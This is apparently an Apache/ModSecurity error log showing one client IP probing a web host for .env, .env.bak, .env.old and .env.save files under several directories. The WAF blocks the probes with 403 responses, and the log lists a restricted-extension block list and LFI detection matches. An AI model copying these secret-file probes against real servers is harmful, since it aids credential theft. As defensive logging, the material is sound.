[Sun Nov 16 06:04:57.500993 2025] [:error] [pid 106191] [client 13.62.46.112:55224] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env.bak"] [unique_id "aRlbeZ9TX0jrupNVR0KhQAAAAAI"]
[Sun Nov 16 06:04:57.501133 2025] [:error] [pid 106191] [client 13.62.46.112:55224] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env.bak"] [unique_id "aRlbeZ9TX0jrupNVR0KhQAAAAAI"]
[Sun Nov 16 06:04:57.503115 2025] [:error] [pid 105754] [client 13.62.46.112:55232] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/application/.env.old"] [unique_id "aRlbeX3mxOhUaPa_1PS3NwAAAAw"]
[Sun Nov 16 06:04:57.503258 2025] [:error] [pid 105754] [client 13.62.46.112:55232] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env.old"] [unique_id "aRlbeX3mxOhUaPa_1PS3NwAAAAw"]
[Sun Nov 16 06:04:57.503422 2025] [:error] [pid 105754] [client 13.62.46.112:55232] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env.old"] [unique_id "aRlbeX3mxOhUaPa_1PS3NwAAAAw"]
[Sun Nov 16 06:04:57.503563 2025] [:error] [pid 105754] [client 13.62.46.112:55232] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env.old"] [unique_id "aRlbeX3mxOhUaPa_1PS3NwAAAAw"]
[Sun Nov 16 06:04:57.519790 2025] [:error] [pid 105733] [client 13.62.46.112:55240] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env.save"] [unique_id "aRlbeQm3iQ6of_5tM-vZGAAAAAY"]
[Sun Nov 16 06:04:57.519935 2025] [:error] [pid 105733] [client 13.62.46.112:55240] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env.save"] [unique_id "aRlbeQm3iQ6of_5tM-vZGAAAAAY"]
[Sun Nov 16 06:04:57.520077 2025] [:error] [pid 105733] [client 13.62.46.112:55240] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env.save"] [unique_id "aRlbeQm3iQ6of_5tM-vZGAAAAAY"]
[Sun Nov 16 06:04:57.521359 2025] [authz_core:error] [pid 103446] [client 13.62.46.112:55188] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env.old
[Sun Nov 16 06:04:57.533064 2025] [:error] [pid 103398] [client 13.62.46.112:55278] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRlbebczEoTwe_Jf335FYAAAAAA"]
[Sun Nov 16 06:04:57.533215 2025] [:error] [pid 103398] [client 13.62.46.112:55278] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRlbebczEoTwe_Jf335FYAAAAAA"]
[Sun Nov 16 06:04:57.533357 2025] [:error] [pid 103398] [client 13.62.46.112:55278] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRlbebczEoTwe_Jf335FYAAAAAA"]
[Sun Nov 16 06:04:57.535631 2025] [:error] [pid 105715] [client 13.62.46.112:55264] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/system/.env.old"] [unique_id "aRlbeTHqqjYXoy22w5Lv9AAAAAE"]
[Sun Nov 16 06:04:57.535765 2025] [:error] [pid 105715] [client 13.62.46.112:55264] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/system/.env.old"] [unique_id "aRlbeTHqqjYXoy22w5Lv9AAAAAE"]
[Sun Nov 16 06:04:57.535897 2025] [:error] [pid 105715] [client 13.62.46.112:55264] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/system/.env.old"] [unique_id "aRlbeTHqqjYXoy22w5Lv9AAAAAE"]
[Sun Nov 16 06:04:57.536040 2025] [:error] [pid 105715] [client 13.62.46.112:55264] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/system/.env.old"] [unique_id "aRlbeTHqqjYXoy22w5Lv9AAAAAE"]
[Sun Nov 16 06:04:57.549849 2025] [:error] [pid 105706] [client 13.62.46.112:55254] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/system/.env.save"] [unique_id "aRlbefgkUVuXhjEnxphnTgAAAAQ"]
[Sun Nov 16 06:04:57.550026 2025] [:error] [pid 105706] [client 13.62.46.112:55254] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/system/.env.save"] [unique_id "aRlbefgkUVuXhjEnxphnTgAAAAQ"]
[Sun Nov 16 06:04:57.550166 2025] [:error] [pid 105706] [client 13.62.46.112:55254] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/system/.env.save"] [unique_id "aRlbefgkUVuXhjEnxphnTgAAAAQ"]
[Sun Nov 16 06:04:57.572100 2025] [:error] [pid 105761] [client 13.62.46.112:55290] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/core/.env.old"] [unique_id "aRlbeRajcO0QlxhJbyzqXAAAAAo"]
[Sun Nov 16 06:04:57.572248 2025] [:error] [pid 105761] [client 13.62.46.112:55290] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env.old"] [unique_id "aRlbeRajcO0QlxhJbyzqXAAAAAo"]
[Sun Nov 16 06:04:57.572397 2025] [:error] [pid 105761] [client 13.62.46.112:55290] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env.old"] [unique_id "aRlbeRajcO0QlxhJbyzqXAAAAAo"]
[Sun Nov 16 06:04:57.572552 2025] [:error] [pid 105761] [client 13.62.46.112:55290] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env.old"] [unique_id "aRlbeRajcO0QlxhJbyzqXAAAAAo"]
[Sun Nov 16 06:04:57.750396 2025] [:error] [pid 105760] [client 13.62.46.112:55304] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/system/.env"] [unique_id "aRlbeSX-V6YaRQK52Hc2BAAAAAU"]
[Sun Nov 16 06:04:57.750607 2025] [:error] [pid 105760] [client 13.62.46.112:55304] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/system/.env"] [unique_id "aRlbeSX-V6YaRQK52Hc2BAAAAAU"]
[Sun Nov 16 06:04:57.750792 2025] [:error] [pid 105760] [client 13.62.46.112:55304] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/system/.env"] [unique_id "aRlbeSX-V6YaRQK52Hc2BAAAAAU"]
[Sun Nov 16 06:04:58.382446 2025] [:error] [pid 106191] [client 13.62.46.112:55298] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env"] [unique_id "aRlbep9TX0jrupNVR0KhQQAAAAI"]
[Sun Nov 16 06:04:58.382706 2025] [:error] [pid 106191] [client 13.62.46.112:55298] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env"] [unique_id "aRlbep9TX0jrupNVR0KhQQAAAAI"]
[Sun Nov 16 06:04:58.382893 2025] [:error] [pid 106191] [client 13.62.46.112:55298] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env"] [unique_id "aRlbep9TX0jrupNVR0KhQQAAAAI"]
[Sun Nov 16 06:04:58.477187 2025] [:error] [pid 106193] [client 13.62.46.112:55242] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/core/.env.bak"] [unique_id "aRlbehmZz13emZeNiG2t-QAAAAg"]
[Sun Nov 16 06:04:58.477374 2025] [:error] [pid 106193] [client 13.62.46.112:55242] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env.bak"] [unique_id "aRlbehmZz13emZeNiG2t-QAAAAg"]
[Sun Nov 16 06:04:58.477604 2025] [:error] [pid 106193] [client 13.62.46.112:55242] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env.bak"] [unique_id "aRlbehmZz13emZeNiG2t-QAAAAg"]
[Sun Nov 16 06:04:58.477807 2025] [:error] [pid 106193] [client 13.62.46.112:55242] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env.bak"] [unique_id "aRlbehmZz13emZeNiG2t-QAAAAg"]
[Sun Nov 16 06:05:29.139852 2025] [:error] [pid 103446] [client 13.62.46.112:37932] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env.old"] [unique_id "aRlbmU-c4YqyOTFJOSeIXgAAAAk"]
[Sun Nov 16 06:05:29.140027 2025] [:error] [pid 103446] [client 13.62.46.112:37932] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env.old"] [unique_id "aRlbmU-c4YqyOTFJOSeIXgAAAAk"]
[Sun Nov 16 06:05:29.140224 2025] [:error] [pid 103446] [client 13.62.46.112:37932] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env.old"] [unique_id "aRlbmU-c4YqyOTFJOSeIXgAAAAk"]
